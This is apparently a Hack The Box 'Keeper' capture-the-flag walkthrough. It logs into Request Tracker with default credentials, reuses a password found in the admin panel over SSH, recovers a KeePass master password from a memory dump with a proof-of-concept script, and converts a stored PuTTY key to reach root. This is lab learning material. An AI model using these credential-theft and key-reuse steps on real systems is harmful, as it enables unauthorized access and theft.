Box: Keeper
Level: Easy
OS: Linux
Lets get started
Recon
Portscanning
command:sudo nmap -A 10.10.11.227 -T4 -v -p-
Nmap scan report for 10.10.11.227
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=10/6%OT=22%CT=1%CU=38405%PV=Y%DS=2%DC=T%G=Y%TM=651F768
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=102%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST11
OS:NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 0.697 days (since Thu Oct 5 11:09:39 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 298.26 ms 10.10.14.1
2 298.28 ms 10.10.11.227
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 6 03:52:57 2023 -- 1 IP address (1 host up) scanned in 784.92 seconds
From our above scan we have 2 open ports, port 22 which runs the ssh service and port 80 which runs the http service. Our enumeration today will be focused on port 80.
Enumeration
Navigate to the webpage
Lets add that subdomain tickets.keeper.htb to our /etc/hosts file
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/keeper]
└─$ sudo nano /etc/hosts
[sudo] password for bl4ck4non:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/keeper]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 bl4ck4non
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.227 tickets.keeper.htb
cool, now lets navigate to that subdomain
okay, we got a login page
Lets try to login with default creds to see what happens
username:admin password:password
oops, it didn’t work
If you take a look at the login page well, you’ll see this
rt basically just means request tracker
Doing my research, I found this
Lets login using those creds
username:root password:password
nice nice, we are logged in
Going through the webpage I found something interesting
Click on Admin>Users>Select, you should see this when you do that
So, we have a user lnorgaard. Click on that user, it should give you more information about the user
We got the password of the user. Lets use this to ssh into the server
username:lnorgaard password:Welcome2023!
cool, we are in. Lets go ahead to escalate our privileges
Privilege Escalation
Checking the user’s directory, I found a zip file
Send the file over to your machine
Lets unzip this file
──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ ls -la
total 332828
drwxr-xr-x 2 bl4ck4non bl4ck4non 4096 Oct 21 12:54 .
drwxr-xr-x 14 bl4ck4non bl4ck4non 4096 Oct 20 18:16 ..
-rwxr-x--- 1 bl4ck4non bl4ck4non 253395188 May 24 11:51 KeePassDumpFull.dmp
-rw-r--r-- 1 bl4ck4non bl4ck4non 87391651 Oct 21 12:50 RT30000.zip
-rw-r--r-- 1 root root 100 Oct 20 18:20 keeper
-rwxr-x--- 1 bl4ck4non bl4ck4non 3630 May 24 11:51 passcodes.kdbx
A .kdbx file is typically a KeePass database file, used by the KeePass password manager. To access and manage the contents of a .kdbx file, you’ll need to use a compatible KeePass client. To install, just run the sudo apt install keepassx command
oops, this requires a password.
John couldn’t crack the password actually.
If you recall, when we extracted the zip file there was a dump file KeePassDumpFull.dmp. When looking for a way to access it I found this
You can download the python script from here
After downloading, lets run the script
command:python3 poc.py -d KeePassDumpFull.dmp
We can see something like dgrâ—Źd med flâ—Źde from the output
putting this on google I found this
Using rødgrød med fløde as the password, I was able to view the keepass file
Checking the network tab,
Lets click on that
nice nice, we can see the password of the root user and also the PuTTY-User-Key-File. But the password wasn’t working when I tried to ssh into the server. Lets try the PuTTY-User-Key-File
Save the PuTTY-User-Key-File in a file say “bankai.ppk”
We can use puttygen to create a .pem key file using the .ppk file.
command:puttygen bankai.ppk -O public-openssh -o bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ puttygen bankai.ppk -O public-openssh -o bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ ls -la bankai.pem
-rw-r--r-- 1 bl4ck4non bl4ck4non 398 Oct 21 18:36 bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ chmod 600 bankai.pem
┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/keeper]
└─$ ls -la id_rsa
-rw------- 1 bl4ck4non bl4ck4non 398 Oct 21 18:36 bankai.pem
smooth, now we can ssh into the server as the root user using the bankai.pem file
command:ssh -i bankai.pem root@tickets.keeper.htb
nice nice, we got root shell, we have successfully pwned this box
That will be all for today
Back To Home